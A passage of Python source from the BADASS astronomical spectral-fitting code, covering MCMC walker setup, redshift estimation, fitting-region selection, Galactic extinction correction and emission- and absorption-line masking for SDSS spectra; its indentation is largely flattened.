print('\n Cleaning up...')
print('----------------------------------------------------------------------------------------------------')
# Delete redundant files to cut down on space
cleanup(run_dir)
# Total time
elap_time = (time.time() - start_time)
if verbose:
print("\n Total Runtime = %s" % (time_convert(elap_time)))
# Write to log
write_log(elap_time,'total_time',run_dir)
print(' - Done fitting %s! \n' % fits_file.stem)
sys.stdout.flush()
return
##################################################################################
def initialize_walkers(init_params,param_names,bounds,soft_cons,nwalkers,ndim):
"""
Initializes the MCMC walkers within bounds and soft constraints.
"""
	# Create reference dictionary for numexpr
pdict = {}
for k in range(0,len(param_names),1):
pdict[param_names[k]] = init_params[k]
pos = init_params + 1.e-3 * np.random.randn(nwalkers,ndim)
# First iterate through bounds
for j in range(np.shape(pos)[1]): # iterate through parameter
for i in range(np.shape(pos)[0]): # iterate through walker
if (pos[i][j]<bounds[j][0]) | (pos[i][j]>bounds[j][1]):
while (pos[i][j]<bounds[j][0]) | (pos[i][j]>bounds[j][1]):
pos[i][j] = init_params[j] + 1.e-3*np.random.randn(1)
return pos
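# Example (illustrative, hypothetical numbers): for 3 free parameters and 10 walkers,
# initialize_walkers([1.0, 50.0, -5.0], ["a", "b", "c"], [(0, 2), (0, 100), (-10, 0)], [], 10, 3)
# returns an array of shape (nwalkers, ndim) = (10, 3), with each walker scattered by ~1e-3
# around the maximum-likelihood values and re-drawn until it lies within the hard parameter bounds.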
#### Calculate Systemic Velocity ################################################
def systemic_vel_est(z,param_dict,burn_in,run_dir,plot_param_hist=True):
"""
Estimates the systemic (stellar) velocity of the galaxy and corrects
the SDSS redshift (which is based on emission lines).
"""
c = 299792.458
# Get measured stellar velocity
stel_vel = np.array(param_dict['stel_vel']['chain'])
# Calculate new redshift
z_best = (z+1)*(1+stel_vel/c)-1
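	# Worked example (hypothetical values): for an SDSS redshift z = 0.0500 and a measured stellar
	# velocity of +150 km/s, z_best = (1 + 0.0500)*(1 + 150/299792.458) - 1 ~ 0.05053.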
# Burned-in + Flattened (along walker axis) chain
# If burn_in is larger than the size of the chain, then
# take 50% of the chain length instead.
if (burn_in >= np.shape(z_best)[1]):
burn_in = int(0.5*np.shape(z_best)[1])
# print('\n Burn-in is larger than chain length! Using 50% of chain length for burn-in...\n')
flat = z_best[:,burn_in:]
flat = flat.flat
# Subsample the data into a manageable size for the kde and HDI
if len(flat[np.isfinite(flat)]) > 0:
subsampled = np.random.choice(flat[np.isfinite(flat)],size=10000)
# Histogram; 'Doane' binning produces the best results from tests.
hist, bin_edges = np.histogram(subsampled, bins='doane', density=False)
# Generate pseudo-data on the ends of the histogram; this prevents the KDE
# from weird edge behavior.
n_pseudo = 3 # number of pseudo-bins
bin_width=bin_edges[1]-bin_edges[0]
lower_pseudo_data = np.random.uniform(low=bin_edges[0]-bin_width*n_pseudo, high=bin_edges[0], size=hist[0]*n_pseudo)
upper_pseudo_data = np.random.uniform(low=bin_edges[-1], high=bin_edges[-1]+bin_width*n_pseudo, size=hist[-1]*n_pseudo)
# Calculate bandwidth for KDE (Silverman method)
h = kde_bandwidth(flat)
	# Create an evaluation grid for the KDE based on the subsampled data; by
	# default, the grid oversamples the histogram binning by a factor of 10.
xs = np.linspace(np.min(subsampled),np.max(subsampled),10*len(hist))
# Calculate KDE
kde = gauss_kde(xs,np.concatenate([subsampled,lower_pseudo_data,upper_pseudo_data]),h)
p68 = compute_HDI(subsampled,0.68)
p95 = compute_HDI(subsampled,0.95)
post_max = xs[kde.argmax()] # posterior max estimated from KDE
post_mean = np.mean(flat)
post_med = np.median(flat)
low_68 = post_max - p68[0]
upp_68 = p68[1] - post_max
low_95 = post_max - p95[0]
upp_95 = p95[1] - post_max
post_std = np.std(flat)
post_mad = stats.median_abs_deviation(flat)
if ((post_max-(3.0*low_68))<0):
flag = 1
else: flag = 0
z_dict = {}
z_dict["z_sys"] = {}
z_dict["z_sys"]["par_best"] = post_max
z_dict["z_sys"]["ci_68_low"] = low_68
z_dict["z_sys"]["ci_68_upp"] = upp_68
z_dict["z_sys"]["ci_95_low"] = low_95
z_dict["z_sys"]["ci_95_upp"] = upp_95
z_dict["z_sys"]["mean"] = post_mean
z_dict["z_sys"]["std_dev"] = post_std
z_dict["z_sys"]["median"] = post_med
z_dict["z_sys"]["med_abs_dev"] = post_mad
z_dict["z_sys"]["flat_chain"] = flat
z_dict["z_sys"]["flag"] = flag
else:
z_dict = {}
z_dict["z_sys"] = {}
z_dict["z_sys"]["par_best"] = np.nan
z_dict["z_sys"]["ci_68_low"] = np.nan
z_dict["z_sys"]["ci_68_upp"] = np.nan
z_dict["z_sys"]["ci_95_low"] = np.nan
z_dict["z_sys"]["ci_95_upp"] = np.nan
z_dict["z_sys"]["mean"] = np.nan
z_dict["z_sys"]["std_dev"] = np.nan
z_dict["z_sys"]["median"] = np.nan
z_dict["z_sys"]["med_abs_dev"] = np.nan
z_dict["z_sys"]["flat_chain"] = flat
z_dict["z_sys"]["flag"] = 1
return z_dict
##################################################################################
#### Find Nearest Function #######################################################
def find_nearest(array, value):
"""
This function finds the nearest value in an array and returns the
closest value and the corresponding index.
"""
array = np.asarray(array)
idx = (np.abs(array - value)).argmin()
return array[idx],idx
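# Example (illustrative): on a 1 Angstrom grid spanning 4800-5200 Angstroms,
# find_nearest(np.linspace(4800.0, 5200.0, 401), 5007.3) returns (5007.0, 207),
# i.e. the closest grid value and its index.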
##################################################################################
#### Convert Seconds to H:M:S Format #############################################
# Python Program to Convert seconds
# into hours, minutes and seconds
def time_convert(seconds):
"""
Converts runtimes in seconds to hours:minutes:seconds format.
"""
seconds = seconds % (24. * 3600.)
hour = seconds // 3600.
seconds %= 3600.
minutes = seconds // 60.
seconds %= 60.
return "%d:%02d:%02d" % (hour, minutes, seconds)
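# Example (illustrative): time_convert(3725.0) returns '1:02:05'
# (3725 s = 1 hour, 2 minutes, 5 seconds).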
##################################################################################
#### Setup Directory Structure ###################################################
def setup_dirs(work_dir,verbose=True):
"""
	This sets up the BADASS directory structure for each spectrum. It creates
the "MCMC_output_#" folders.
"""
def atoi(text):
return int(text) if text.isdigit() else text
def natural_keys(text):
'''
alist.sort(key=natural_keys) sorts in human order
http://nedbatchelder.com/blog/200712/human_sorting.html
(See Toothy's implementation in the comments)
'''
		return [ atoi(c) for c in re.split(r'(\d+)', text) ]
# Get list of folders in work_dir:
folders = glob.glob(work_dir+'MCMC_output_*')
folders.sort(key=natural_keys)
if (len(folders)==0):
if verbose:
print(' Folder has not been created. Creating MCMC_output folder...')
# Create the first MCMC_output file starting with index 1
os.mkdir(work_dir+'MCMC_output_1')
run_dir = os.path.join(work_dir,'MCMC_output_1/') # running directory
prev_dir = None
else:
# Get last folder name
s = folders[-1]
result = re.search('MCMC_output_(.*)', s)
# The next folder is named with this number
fnum = str(int(result.group(1))+1)
prev_num = str(int(result.group(1)))
		# Create the next MCMC_output folder in the sequence
new_fold = work_dir+'MCMC_output_'+fnum+'/'
prev_fold = work_dir+'MCMC_output_'+prev_num+'/'
os.mkdir(new_fold)
run_dir = new_fold
		# The previous run directory is returned regardless of whether an MCMC_chain.csv exists there
		prev_dir = prev_fold
if verbose:
print(' Storing MCMC_output in %s' % run_dir)
return run_dir,prev_dir
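# Example (illustrative): if work_dir already contains MCMC_output_1/ and MCMC_output_2/,
# the next call to setup_dirs(work_dir) creates MCMC_output_3/ and returns
# run_dir = work_dir + 'MCMC_output_3/' and prev_dir = work_dir + 'MCMC_output_2/'.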
##################################################################################
#### Determine fitting region ####################################################
# SDSS spectra
def determine_fit_reg_sdss(fits_file, run_dir, fit_reg, good_thresh, fit_losvd, losvd_options, verbose):
"""
Determines the fitting region for SDSS spectra.
"""
# Limits of the stellar template wavelength range
# The stellar templates packaged with BADASS are from the Indo-US Coude Feed Stellar Template Library
# with the below wavelength ranges.
if (losvd_options["library"]=="IndoUS"):
min_losvd, max_losvd = 3460, 9464
if (losvd_options["library"]=="Vazdekis2010"):
min_losvd, max_losvd = 3540.5, 7409.6
if (losvd_options["library"]=="eMILES"):
min_losvd, max_losvd = 1680.2, 49999.4
# Open spectrum file
hdu = fits.open(fits_file)
specobj = hdu[2].data
z = specobj['z'][0]
# t = hdu['COADD'].data
t = hdu[1].data
lam_gal = (10**(t['loglam']))/(1+z)
gal = t['flux']
ivar = t['ivar']
and_mask = t['and_mask']
# Edges of wavelength vector
first_good = lam_gal[0]
last_good = lam_gal[-1]
if ((fit_reg=='auto') or (fit_reg=='full')):
# The lower limit of the spectrum must be the lower limit of our stellar templates
if ((fit_losvd==True) & (first_good < min_losvd)) | ((fit_losvd==True) & (last_good > max_losvd)):
if verbose:
				print("\n Warning: Fitting LOSVD requires wavelength range between %d Å and %d Å for stellar templates. BADASS will adjust your fitting range to fit the LOSVD..." % (min_losvd,max_losvd))
print(" - Available wavelength range: (%d, %d)" % (first_good, last_good) )
auto_low = np.max([min_losvd,first_good]) # Indo-US Library of Stellar Templates has a lower limit of 3460
# auto_upp = determine_upper_bound(first_good,last_good)
auto_upp = np.min([max_losvd,last_good])
# if (auto_upp is not None):
new_fit_reg = (np.floor(auto_low),np.ceil(auto_upp))
if verbose:
print(" - New fitting region is (%d, %d). \n" % (new_fit_reg[0], new_fit_reg[1]) )
# elif (auto_upp is None):
# new_fit_reg = None
# return None, None
elif (fit_losvd==False):
new_fit_reg = (np.floor(first_good),np.ceil(last_good))
elif isinstance(fit_reg,(tuple,list)):
# Check to see if tuple/list makes sense
if ((fit_reg[0]>fit_reg[1]) | (fit_reg[1]<fit_reg[0])): # if boundaries overlap
if verbose:
print('\n Fitting boundaries overlap! \n')
new_fit_reg = None
return None, None
elif (fit_reg[0] > last_good) | (fit_reg[1] < first_good):
if verbose:
print('\n Fitting region not available! \n')
new_fit_reg = None
return None, None
elif ((fit_losvd==True) & (fit_reg[0]<min_losvd)) | ((fit_losvd==True) & (fit_reg[1]>max_losvd)):
if verbose:
				print("\n Warning: Fitting LOSVD requires wavelength range between %d Å and %d Å for stellar templates. BADASS will adjust your fitting range to fit the LOSVD..." % (min_losvd,max_losvd))
print(" - Input fitting range: (%d, %d)" % (fit_reg[0], fit_reg[1]) )
print(" - Available wavelength range: (%d, %d)" % (first_good, last_good) )
wave_low = np.max([min_losvd,fit_reg[0],first_good])
wave_upp = np.min([max_losvd,fit_reg[1],last_good])
new_fit_reg = (np.floor(wave_low),np.ceil(wave_upp))
if verbose:
print(" - New fitting region is (%d, %d). \n" % (new_fit_reg[0], new_fit_reg[1]) )
else:# (fit_losvd==False):
if (fit_reg[0] < first_good) | (fit_reg[1] > last_good):
if verbose:
print("\n Input fitting region exceeds available wavelength range. BADASS will adjust your fitting range automatically...")
print(" - Input fitting range: (%d, %d)" % (fit_reg[0], fit_reg[1]) )
print(" - Available wavelength range: (%d, %d)" % (first_good, last_good) )
wave_low = np.max([fit_reg[0],first_good])
wave_upp = np.min([fit_reg[1],last_good])
new_fit_reg = (np.floor(wave_low),np.ceil(wave_upp))
if verbose:
print(" - New fitting region is (%d, %d). \n" % (new_fit_reg[0], new_fit_reg[1]) )
else:
new_fit_reg = (np.floor(fit_reg[0]),np.ceil(fit_reg[1]))
# Determine number of good pixels in new fitting region
mask = ((lam_gal >= new_fit_reg[0]) & (lam_gal <= new_fit_reg[1]))
igood = np.where((gal[mask]>0) & (ivar[mask]>0) & (and_mask[mask]==0))[0]
ibad = np.where(and_mask[mask]!=0)[0]
good_frac = (len(igood)*1.0)/len(gal[mask])
if 0:
##################################################################################
fig = plt.figure(figsize=(14,6))
ax1 = fig.add_subplot(1,1,1)
ax1.plot(lam_gal,gal,linewidth=0.5)
ax1.axvline(new_fit_reg[0],linestyle='--',color='xkcd:yellow')
ax1.axvline(new_fit_reg[1],linestyle='--',color='xkcd:yellow')
ax1.scatter(lam_gal[mask][ibad],gal[mask][ibad],color='red')
ax1.set_ylabel(r'$f_\lambda$ ($10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\mathrm{\AA}^{-1}$)')
ax1.set_xlabel(r'$\lambda_{\rm{rest}}$ ($\mathrm{\AA}$)')
plt.tight_layout()
plt.savefig(run_dir.joinpath('good_pixels.pdf'),fmt='pdf',dpi=150)
fig.clear()
plt.close()
##################################################################################
# Close the fits file
hdu.close()
##################################################################################
return new_fit_reg,good_frac
# User (non-SDSS) spectra
def determine_fit_reg_user(wave, z, run_dir, fit_reg, good_thresh, fit_losvd, losvd_options, verbose):
"""
Determines valid fitting region for a user-input spectrum.
"""
# Limits of the stellar template wavelength range
# The stellar templates packaged with BADASS are from the Indo-US Coude Feed Stellar Template Library
# with the below wavelength ranges.
min_losvd = 3460
max_losvd = 9464
lam_gal = wave/(1+z)
# Edges of wavelength vector
first_good = lam_gal[0]
last_good = lam_gal[-1]
if ((fit_reg=='auto') or (fit_reg=='full')):
# The lower limit of the spectrum must be the lower limit of our stellar templates
if ((fit_losvd==True) & (first_good < min_losvd)) | ((fit_losvd==True) & (last_good > max_losvd)):
if verbose:
				print("\n Warning: Fitting LOSVD requires wavelength range between %d Å and %d Å for stellar templates. BADASS will adjust your fitting range to fit the LOSVD..." % (min_losvd,max_losvd))
print(" - Available wavelength range: (%d, %d)" % (first_good, last_good) )
auto_low = np.max([min_losvd,first_good]) # Indo-US Library of Stellar Templates has a lower limit of 3460
# auto_upp = determine_upper_bound(first_good,last_good)
auto_upp = np.min([max_losvd,last_good])
# if (auto_upp is not None):
new_fit_reg = (np.floor(auto_low),np.ceil(auto_upp))
if verbose:
print(" - New fitting region is (%d, %d). \n" % (new_fit_reg[0], new_fit_reg[1]) )
# elif (auto_upp is None):
# new_fit_reg = None
# return None, None
elif (fit_losvd==False):
new_fit_reg = (np.floor(first_good),np.ceil(last_good))
elif isinstance(fit_reg,(tuple,list)):
# Check to see if tuple/list makes sense
if ((fit_reg[0]>fit_reg[1]) | (fit_reg[1]<fit_reg[0])): # if boundaries overlap
if verbose:
print('\n Fitting boundaries overlap! \n')
new_fit_reg = None
return None, None
elif (fit_reg[0] > last_good) | (fit_reg[1] < first_good):
if verbose:
print('\n Fitting region not available! \n')
new_fit_reg = None
return None, None
elif ((fit_losvd==True) & (fit_reg[0]<min_losvd)) | ((fit_losvd==True) & (fit_reg[1]>max_losvd)):
if verbose:
				print("\n Warning: Fitting LOSVD requires wavelength range between %d Å and %d Å for stellar templates. BADASS will adjust your fitting range to fit the LOSVD..." % (min_losvd,max_losvd))
print(" - Input fitting range: (%d, %d)" % (fit_reg[0], fit_reg[1]) )
print(" - Available wavelength range: (%d, %d)" % (first_good, last_good) )
wave_low = np.max([min_losvd,fit_reg[0],first_good])
wave_upp = np.min([max_losvd,fit_reg[1],last_good])
new_fit_reg = (np.floor(wave_low),np.ceil(wave_upp))
if verbose:
print(" - New fitting region is (%d, %d). \n" % (new_fit_reg[0], new_fit_reg[1]) )
else:# (fit_losvd==False):
if (fit_reg[0] < first_good) | (fit_reg[1] > last_good):
if verbose:
print("\n Input fitting region exceeds available wavelength range. BADASS will adjust your fitting range automatically...")
print(" - Input fitting range: (%d, %d)" % (fit_reg[0], fit_reg[1]) )
print(" - Available wavelength range: (%d, %d)" % (first_good, last_good) )
wave_low = np.max([fit_reg[0],first_good])
wave_upp = np.min([fit_reg[1],last_good])
new_fit_reg = (np.floor(wave_low),np.ceil(wave_upp))
if verbose:
print(" - New fitting region is (%d, %d). \n" % (new_fit_reg[0], new_fit_reg[1]) )
else:
new_fit_reg = (np.floor(fit_reg[0]),np.ceil(fit_reg[1]))
##################################################################################
return new_fit_reg,1.0
##################################################################################
#### Galactic Extinction Correction ##############################################
def ccm_unred(wave, flux, ebv, r_v=""):
"""ccm_unred(wave, flux, ebv, r_v="")
Deredden a flux vector using the CCM 1989 parameterization
Returns an array of the unreddened flux
INPUTS:
wave - array of wavelengths (in Angstroms)
	flux - calibrated flux array, same number of elements as wave
ebv - colour excess E(B-V) float. If a negative ebv is supplied
fluxes will be reddened rather than dereddened
OPTIONAL INPUT:
r_v - float specifying the ratio of total selective
extinction R(V) = A(V)/E(B-V). If not specified,
then r_v = 3.1
OUTPUTS:
funred - unreddened calibrated flux array, same number of
elements as wave
NOTES:
1. This function was converted from the IDL Astrolib procedure
last updated in April 1998. All notes from that function
(provided below) are relevant to this function
2. (From IDL:) The CCM curve shows good agreement with the Savage & Mathis (1979)
ultraviolet curve shortward of 1400 A, but is probably
preferable between 1200 and 1400 A.
3. (From IDL:) Many sightlines with peculiar ultraviolet interstellar extinction
can be represented with a CCM curve, if the proper value of
R(V) is supplied.
4. (From IDL:) Curve is extrapolated between 912 and 1000 A as suggested by
Longo et al. (1989, ApJ, 339,474)
5. (From IDL:) Use the 4 parameter calling sequence if you wish to save the
original flux vector.
6. (From IDL:) Valencic et al. (2004, ApJ, 616, 912) revise the ultraviolet CCM
curve (3.3 -- 8.0 um-1). But since their revised curve does
not connect smoothly with longer and shorter wavelengths, it is
not included here.
7. For the optical/NIR transformation, the coefficients from
O'Donnell (1994) are used
>>> ccm_unred([1000, 2000, 3000], [1, 1, 1], 2 )
array([9.7976e+012, 1.12064e+07, 32287.1])
"""
wave = np.array(wave, float)
flux = np.array(flux, float)
if wave.size != flux.size: raise TypeError( 'ERROR - wave and flux vectors must be the same size')
if not bool(r_v): r_v = 3.1
x = 10000.0/wave
# Correction invalid for x>11:
if np.any(x>11):
return flux
npts = wave.size
a = np.zeros(npts, float)
b = np.zeros(npts, float)
###############################
#Infrared
good = np.where( (x > 0.3) & (x < 1.1) )
a[good] = 0.574 * x[good]**(1.61)
b[good] = -0.527 * x[good]**(1.61)
###############################
# Optical & Near IR
good = np.where( (x >= 1.1) & (x < 3.3) )
y = x[good] - 1.82
c1 = np.array([ 1.0 , 0.104, -0.609, 0.701, 1.137, \
-1.718, -0.827, 1.647, -0.505 ])
c2 = np.array([ 0.0, 1.952, 2.908, -3.989, -7.985, \
11.102, 5.491, -10.805, 3.347 ] )
a[good] = np.polyval(c1[::-1], y)
b[good] = np.polyval(c2[::-1], y)
###############################
# Mid-UV
good = np.where( (x >= 3.3) & (x < 8) )
y = x[good]
F_a = np.zeros(np.size(good),float)
F_b = np.zeros(np.size(good),float)
good1 = np.where( y > 5.9 )
if np.size(good1) > 0:
y1 = y[good1] - 5.9
F_a[ good1] = -0.04473 * y1**2 - 0.009779 * y1**3
F_b[ good1] = 0.2130 * y1**2 + 0.1207 * y1**3
a[good] = 1.752 - 0.316*y - (0.104 / ( (y-4.67)**2 + 0.341 )) + F_a
b[good] = -3.090 + 1.825*y + (1.206 / ( (y-4.62)**2 + 0.263 )) + F_b
###############################
# Far-UV
good = np.where( (x >= 8) & (x <= 11) )
y = x[good] - 8.0
c1 = [ -1.073, -0.628, 0.137, -0.070 ]
c2 = [ 13.670, 4.257, -0.420, 0.374 ]
a[good] = np.polyval(c1[::-1], y)
b[good] = np.polyval(c2[::-1], y)
# Applying Extinction Correction
a_v = r_v * ebv
a_lambda = a_v * (a + b/r_v)
funred = flux * 10.0**(0.4*a_lambda)
return funred #,a_lambda
##################################################################################
def nan_helper(y):
"""
Helper to handle indices and logical indices of NaNs.
Input:
- y, 1d numpy array with possible NaNs
Output:
- nans, logical indices of NaNs
- index, a function, with signature indices= index(logical_indices),
to convert logical indices of NaNs to 'equivalent' indices
Example:
>>> # linear interpolation of NaNs
>>> nans, x= nan_helper(y)
>>> y[nans]= np.interp(x(nans), x(~nans), y[~nans])
"""
return np.isnan(y), lambda z: z.nonzero()[0]
def insert_nan(spec,ibad):
"""
	Inserts additional NaN values into the pixels neighboring the ibad pixels.
"""
all_bad = np.unique(np.concatenate([ibad-1,ibad,ibad+1]))
ibad_new = []
for i in all_bad:
if (i>0) & (i<len(spec)):
ibad_new.append(i)
ibad_new = np.array(ibad_new)
try:
spec[ibad_new] = np.nan
return spec
except:
return spec
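# Example (illustrative): masking pixel 3 of a 6-pixel spectrum also masks its immediate neighbors:
# insert_nan(np.arange(6, dtype=float), np.array([3])) returns [0., 1., nan, nan, nan, 5.].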
def emline_masker(wave,spec,noise):
"""
	Runs a series of moving-window median filters
	to determine the locations of emission lines
	and generate an emission-line mask for
	continuum fitting.
"""
# Do a series of median filters with window sizes up to 20
window_sizes = [2,5,10,50,100,250,500]#np.arange(10,510,10,dtype=int)
med_spec = np.empty((len(wave),len(window_sizes)))
#
for i in range(len(window_sizes)):
med_spec[:,i] = window_filter(spec,window_sizes[i])
#
mask_bad = np.unique(np.where((np.std(med_spec,axis=1)>noise) | (np.std(med_spec,axis=1)>np.nanmedian(noise)))[0])
# mask_good = np.unique(np.where((np.std(med_spec,axis=1)<noise) & (np.std(med_spec,axis=1)<np.nanmedian(noise)))[0])
#
return mask_bad#,mask_good
def metal_masker(wave,spec,noise,fits_file):
"""
Runs a neural network using BIFROST
	to determine the locations of metal absorption lines
	and generate an absorption-line mask for
continuum fitting.
"""
# Initialize the neural network
line_name = ['metal_abs', 'generic_line']
neuralnet = bifrost.NeuralNet()
# Set up file paths
path = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'badass_data_files', 'neural_network')
if not os.path.exists(path):
os.mkdir(path)
_file = os.path.join(path, "metal.absorption.network.h5")
_plot = os.path.join(os.path.abspath(os.path.dirname(fits_file)), "metal.nn.convolve.html")
# If not already trained, it must be trained
if not os.path.exists(_file):
print("Training neural network to mask metal absorption...")
neuralnet.train(line_name, target_line=0, size=100_000, epochs=11, save_path=_file)
# Otherwise, just load in the already-trained neural network
else:
neuralnet.load(_file, line_name, target_line=0)
# Convert arrays to the native byte order
l_wave = wave if wave.dtype.byteorder == '=' else wave.byteswap().newbyteorder('=')
l_spec = spec if spec.dtype.byteorder == '=' else spec.byteswap().newbyteorder('=')
l_noise = noise if noise.dtype.byteorder == '=' else noise.byteswap().newbyteorder('=')
# (the noise isn't actually used)
# Smooth and subtract spectrum to leave only narrow features
l_spec = (l_spec - gaussian_filter1d(l_spec, 20)) / np.nanmedian(l_spec)
l_noise = l_noise / np.nanmedian(l_spec)
# Now the fun part, do a "convolution" (not really) of the neural network with a 100-angstrom wide window
# to get the confidence that a metal absorption line exists at each wavelength
cwave, conf = neuralnet.convolve(l_wave, l_spec, l_noise, out_path=_plot)
# Additional challenge -- re-mapping cwave back onto the original wave array
remap = np.array([np.abs(wave - cwi).argmin() for cwi in cwave])
# Mask all pixels where the confidence is over 50%
mask_bad = remap[conf > 0.5]
return mask_bad
def window_filter(spec,size):
"""
Estimates the median value of the spectrum
within a pixel window.
"""
med_spec = np.empty(len(spec))
pix = np.arange(0,len(spec),1)
for i,p in enumerate(pix):
# Get n-nearest pixels
# Calculate distance from i to each pixel
i_sort =np.argsort(np.abs(i-pix))
idx = pix[i_sort][:size] # indices we estimate from
med = np.median(spec[idx])
med_spec[i] = med
#
return med_spec
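# Example (illustrative): a running median over the 3 nearest pixels,
# window_filter(np.array([1.0, 10.0, 2.0, 9.0, 3.0]), 3), returns [2., 2., 9., 3., 3.].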
def interpolate_metal(spec,noise):
"""
Interpolates over metal absorption lines for
high-redshift spectra using a moving median
filter.
"""
sig_clip = 3.0
nclip = 10
bandwidth= 15
med_spec = window_filter(spec,bandwidth)
count = 0
new_spec = np.copy(spec)
while (count<=nclip) and ((np.std(new_spec-med_spec)*sig_clip)>np.median(noise)):
count+=1
# Get locations of nan or -inf pixels
nan_spec = np.where((np.abs(new_spec-med_spec)>(np.std(new_spec-med_spec)*sig_clip)) & (new_spec < (med_spec-sig_clip*noise)) )[0]
if len(nan_spec)>0:
inan = np.unique(np.concatenate([nan_spec]))
buffer = 0
inan_buffer_upp = np.array([(i+buffer) for i in inan if (i+buffer) < len(spec)],dtype=int)
inan_buffer_low = np.array([(i-buffer) for i in inan if (i-buffer) > 0],dtype=int)
inan = np.concatenate([inan,inan_buffer_low, inan_buffer_upp])
# Interpolate over nans and infs if in spec
new_spec[inan] = np.nan
new_spec = insert_nan(new_spec,inan)
nans, x= nan_helper(new_spec)
new_spec[nans]= np.interp(x(nans), x(~nans), new_spec[~nans])
else:
break
#
return new_spec
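# Illustrative usage note: this helper is not called by default (prepare_sdss_spec uses
# metal_masker() instead; see the commented-out call there), but it can be applied manually,
# e.g. galaxy = interpolate_metal(galaxy, noise) with 1-D flux and 1-sigma noise arrays.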
##################################################################################
#### Prepare SDSS spectrum #######################################################
def prepare_sdss_spec(fits_file,fit_reg,mask_bad_pix,mask_emline,user_mask,mask_metal,cosmology,run_dir,verbose=True,plot=False):
"""
Adapted from an example in Cappellari's pPXF (Cappellari et al. 2004, 2017).
Prepare an SDSS spectrum for pPXF, returning all necessary
parameters.
"""
# Load the data
hdu = fits.open(fits_file)
header_cols = [i.keyword for i in hdu[0].header.cards]
# Retrieve redshift from spectrum file (specobj table)
specobj = hdu[2].data
z = specobj['z'][0]
# For featureless objects, we force z = 0
# fit_reg = (0,20000)
# Retrieve RA and DEC from spectrum file
# if RA and DEC not present, assume an average Galactic E(B-V)
if ("RA" in header_cols) and ("DEC" in header_cols):
ra = hdu[0].header['RA']
dec = hdu[0].header['DEC']
ebv_corr = True
else:
ebv_corr = False
# t = hdu['COADD'].data
t = hdu[1].data
hdu.close()
# Only use the wavelength range in common between galaxy and stellar library.
# Determine limits of spectrum vs templates
# mask = ( (t['loglam'] > np.log10(3540)) & (t['loglam'] < np.log10(7409)) )
fit_min,fit_max = float(fit_reg[0]),float(fit_reg[1])
# mask = ( ((t['loglam']) >= np.log10(fit_min*(1+z))) & ((t['loglam']) <= np.log10(fit_max*(1+z))) )
def generate_mask(fit_min, fit_max, lam):
"""
This function generates a mask that includes all
channels *including* the user-input fit_min and fit_max.
"""
# Get lower limit
low, low_idx = find_nearest(lam, fit_min)
if (low > fit_min) & (low_idx!=0):
low_idx -= 1
low_val, _ = find_nearest(lam, lam[low_idx])
# Get upper limit
upp, upp_idx = find_nearest(lam, fit_max)
if (upp < fit_max) & (upp_idx != len(lam)-1):
upp_idx += 1
upp_val, _ = find_nearest(lam, lam[upp_idx])
mask = ( ( ((10**t['loglam'])/(1+z)) >= low_val) & ( ((10**t['loglam'])/(1+z)) <= upp_val) )
return mask
mask = generate_mask(fit_min, fit_max, (10**t['loglam'])/(1+z) )
# Unpack the spectra
galaxy = t['flux'][mask]
# SDSS spectra are already log10-rebinned
loglam_gal = t['loglam'][mask] # This is the observed SDSS wavelength range, NOT the rest wavelength range of the galaxy
lam_gal = 10**loglam_gal
ivar = t['ivar'][mask] # inverse variance
noise = np.sqrt(1.0/ivar) # 1-sigma spectral noise
and_mask = t['and_mask'][mask] # bad pixels
bad_pix = np.where(and_mask!=0)[0]
### Interpolating over bad pixels ############################
# Get locations of nan or -inf pixels
nan_gal = np.where(~np.isfinite(galaxy))[0]
nan_noise = np.where(~np.isfinite(noise))[0]
inan = np.unique(np.concatenate([nan_gal,nan_noise]))
# Interpolate over nans and infs if in galaxy or noise
noise[inan] = np.nan
noise[inan] = 1.0 if all(np.isnan(noise)) else np.nanmedian(noise)
fit_mask_bad = []
if mask_bad_pix:
for b in bad_pix:
fit_mask_bad.append(b)
if mask_emline:
emline_mask_bad = emline_masker(lam_gal,galaxy,noise)
for b in emline_mask_bad:
fit_mask_bad.append(b)
if len(user_mask)>0:
for i in user_mask:
ibad = np.where((lam_gal/(1.0+z)>=i[0]) & (lam_gal/(1.0+z)<=i[1]))[0]
for b in ibad:
fit_mask_bad.append(b)
if mask_metal:
# galaxy = interpolate_metal(galaxy,noise)
metal_mask_bad = metal_masker(lam_gal,galaxy,noise,fits_file)
for b in metal_mask_bad:
fit_mask_bad.append(b)
fit_mask_bad = np.sort(np.unique(fit_mask_bad))
fit_mask_good = np.setdiff1d(np.arange(0,len(lam_gal),1,dtype=int),fit_mask_bad)
###############################################################
c = 299792.458 # speed of light in km/s
frac = lam_gal[1]/lam_gal[0] # Constant lambda fraction per pixel
dlam_gal = (frac - 1)*lam_gal # Size of every pixel in Angstrom
# print('\n Size of every pixel: %s (A)' % dlam_gal)
wdisp = t['wdisp'][mask] # Intrinsic dispersion of every pixel, in pixels units
fwhm_gal = 2.355*wdisp*dlam_gal # Resolution FWHM of every pixel, in angstroms
velscale = np.log(frac)*c # Constant velocity scale in km/s per pixel
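# Worked example: for standard SDSS log10 binning of 1e-4 dex per pixel,
# frac = 10**1e-4 ~ 1.00023, so velscale = ln(1.00023)*c ~ 69 km/s per pixel.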
# If the galaxy is at significant redshift, one should bring the galaxy
# spectrum roughly to the rest-frame wavelength, before calling pPXF
# (see Sec. 2.4 of Cappellari 2017). In practice there is no
# need to modify the spectrum in any way, given that a redshift
# corresponds to a linear shift of the log-rebinned spectrum.
# One just needs to compute the wavelength range in the rest-frame
# and adjust the instrumental resolution of the galaxy observations.
# This is done with the following two lines:
#
lam_gal = lam_gal/(1.0+z) # Compute approximate restframe wavelength
fwhm_gal = fwhm_gal/(1.0+z) # Adjust resolution in Angstrom
# fwhm_gal = np.full_like(lam_gal,0.0)
# We pass this interp1d class to the fit_model function to correct for
# the instrumental resolution of emission lines in our model
# fwhm_gal_ftn = interp1d(lam_gal,fwhm_gal,kind='linear',bounds_error=False,fill_value=(1.e-10,1.e-10))
val,idx = find_nearest(lam_gal,5175)
################################################################################
#################### Correct for galactic extinction ##################
if ebv_corr==True:
co = coordinates.SkyCoord(ra=ra, dec=dec, unit=(u.deg, u.deg), frame='fk5')
try:
table = IrsaDust.get_query_table(co,section='ebv')
ebv = table['ext SandF mean'][0]
except:
ebv = 0.04 # average Galactic E(B-V)
# If E(B-V) is large, it can significantly affect normalization of the
# spectrum, in addition to changing its shape. Re-normalizing the spectrum
# throws off the maximum likelihood fitting, so instead of re-normalizing,
# we set an upper limit on the allowed ebv value for Galactic de-reddening.
if (ebv>=1.0):
ebv = 0.04 # average Galactic E(B-V)
elif ebv_corr==False:
ebv = 0.04 # average Galactic E(B-V)
galaxy = ccm_unred(lam_gal,galaxy,ebv)
#######################################################################
# Write to log
